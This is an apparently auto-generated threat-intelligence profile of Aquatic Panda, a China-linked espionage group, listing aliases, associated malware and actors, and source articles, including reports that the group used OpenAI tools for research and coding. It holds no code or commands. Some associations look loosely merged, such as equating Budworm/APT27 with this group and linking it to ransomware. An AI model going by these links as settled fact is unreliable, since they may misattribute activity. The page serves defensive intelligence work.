Aquatic Panda

Threat Actor Profile Updated 3 months ago

Download STIX

Preview STIX

Aquatic Panda, also known as Budworm, Charcoal Typhoon, ControlX, RedHotel, and Bronze University, is a significant threat actor suspected of state-backed cyber espionage activities. This group has been particularly active in the recent quarter, ranking amongst the top geopolitical groups targeting users of the Netskope Security Cloud platform. Additionally, evidence of suspected Log4j exploits was found in their possession, indicating the use of sophisticated attack techniques. Aquatic Panda is associated with China, alongside another threat actor known as Maverick Panda. Notably, Aquatic Panda has been observed leveraging advanced capabilities provided by OpenAI, including open-source research, identifying potential targets, code creation and resolution of coding errors, vulnerability research, and translation of foreign technical papers. This indicates a high level of sophistication and adaptability, suggesting that the group is well-resourced and poses a significant cybersecurity threat. The group's activities align with those of other major threat actors such as APT 28 (Russia), Kimusky (North Korea), and Imperial Kitten (Iran), each utilizing advanced AI capabilities to enhance their operations. The activities of Aquatic Panda have raised concerns within the cybersecurity industry. Adam Meyers, head of counter adversary operations at CrowdStrike, specifically identified the group as a primary source of concern. However, it should be noted that Aquatic Panda is not the only threat actor exploiting ransomware; other active criminal adversary groups such as TA505 and FIN7 are also heavily reliant on ransomware, creating additional challenges for cybersecurity defenses worldwide.

What's your take? (Question 1 of 5)

Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.

Possible Aliases / Cluster overlaps

It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.

ID	Votes	Profile Description
Bronze University	1	Bronze University, also known as Aquatic Panda, ControlX, RedHotel, and Earth Lusca, is a threat actor group believed to be a Chinese state-sponsored hacking operation. The group has been active since 2021, targeting government, aerospace, education, telecommunications, media, and research organizat
Charcoal Typhoon	1	Charcoal Typhoon, a China-affiliated threat actor, has been identified as one of the state-backed groups using OpenAI's ChatGPT for malicious purposes. The group is known for focusing on tracking groups in Taiwan, Thailand, Mongolia, Malaysia, France, Nepal, and individuals globally that oppose Chin
Redhotel	1	RedHotel, also known as Aquatic Panda, ControlX, and Bronze University, is a threat actor linked to Chinese state-sponsored cyber groups. It is part of a sophisticated network of espionage operations including RedAlpha, Poison Carp, and i-SOON, which are primarily involved in the theft of telecommun
Budworm	1	Budworm, also known as LuckyMouse or APT 27, is a threat actor that has been associated with various high-profile cyber attacks. This group has been found to utilize tools such as the Korplug backdoor, which is commonly used by multiple Advanced Persistent Threats (APTs) including Budworm and APT41,

Miscellaneous Associations

Other elements of context that could aid in the identification of relevance

Netskope

Apt

Vulnerability

Ransomware

Exploits

Log4j

Associated Malware

To see the evidence that has resulted in this association, create a free account

ID	Type	Votes	Profile Description
REvil	Unspecified	1	REvil is a notorious form of malware, specifically ransomware, that infiltrates systems to disrupt operations and steal data. The ransomware operates on a Ransomware as a Service (RaaS) model, which gained traction in 2020. In this model, REvil, like other first-stage malware such as Dridex and Goot
Clop	Unspecified	1	Clop is a notorious malware, short for malicious software, known for its disruptive and damaging effects on computer systems. It primarily infiltrates systems through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, Clop can steal personal information, disrupt o

Associated Threat Actors

To see the evidence that has resulted in this association, create a free account

ID	Type	Votes	Profile Description
FIN7	Unspecified	1	FIN7, a notorious threat actor group known for its malicious activities, has recently been identified as targeting a large U.S. carmaker with phishing attacks. This group, which has previously operated behind fake cybersecurity companies such as Combi Security and Bastion Secure to recruit security
DarkSide	Unspecified	1	DarkSide is a notable threat actor that emerged in the cybersecurity landscape with its advanced ransomware operations. In 2021, the group gained significant attention for its attack on the United States' largest oil pipeline, Colonial Pipeline, causing a temporary halt to all operations for three d
TA505	Unspecified	1	TA505, also known as Cl0p Ransomware Gang and Lace Tempest, is a highly active and sophisticated cybercriminal group. The group has been associated with various high-profile cyber-attacks, demonstrating adaptability through a multi-vector approach to their operations. In June 2023, the U.S. Cybersec
Imperial Kitten	Unspecified	1	Imperial Kitten, also known as Tortoiseshell and UNC1549, is a significant threat actor identified by cybersecurity firms CrowdStrike and Mandiant. The group has been associated with various malicious activities, including the distribution of malware through SWC, and the use of IMAPLoader and other

Associated Vulnerabilities

To see the evidence that has resulted in this association, create a free account

ID	Type	Votes	Profile Description
No associations to display

Source Document References

Information about the Aquatic Panda Threat Actor was read from the documents corpus below. This display is limited to 20 results, create a free account to see more

Source	CreatedAt	Title
CERT-EU	5 months ago	iSoon's Secret APT Status Exposes China's Foreign Hacking Machination \| #hacking \| #cybersecurity \| #infosec \| #comptia \| #pentest \| #hacker \| National Cyber Security Consulting
DARKReading	5 months ago	iSoon's Secret APT Status Exposes China's Foreign Hacking Machination
CERT-EU	5 months ago	Global AI Developers Need to Set Some Standards – Now
DARKReading	5 months ago	Microsoft, OpenAI: Nation-States Are Weaponizing AI in Cyberattacks
BankInfoSecurity	5 months ago	OpenAI and Microsoft Terminate State-Backed Hacker Accounts
CERT-EU	8 months ago	CyberTalk with Ray Canzanese
CERT-EU	9 months ago	Netskope Threat Labs report says highest percentage of cybercrime activity originates in Russia
CERT-EU	9 months ago	Criminal groups focus on Australia and US
MITRE	a year ago	AQUATIC PANDA in Possession of Log4Shell Exploit Tools \| CrowdStrike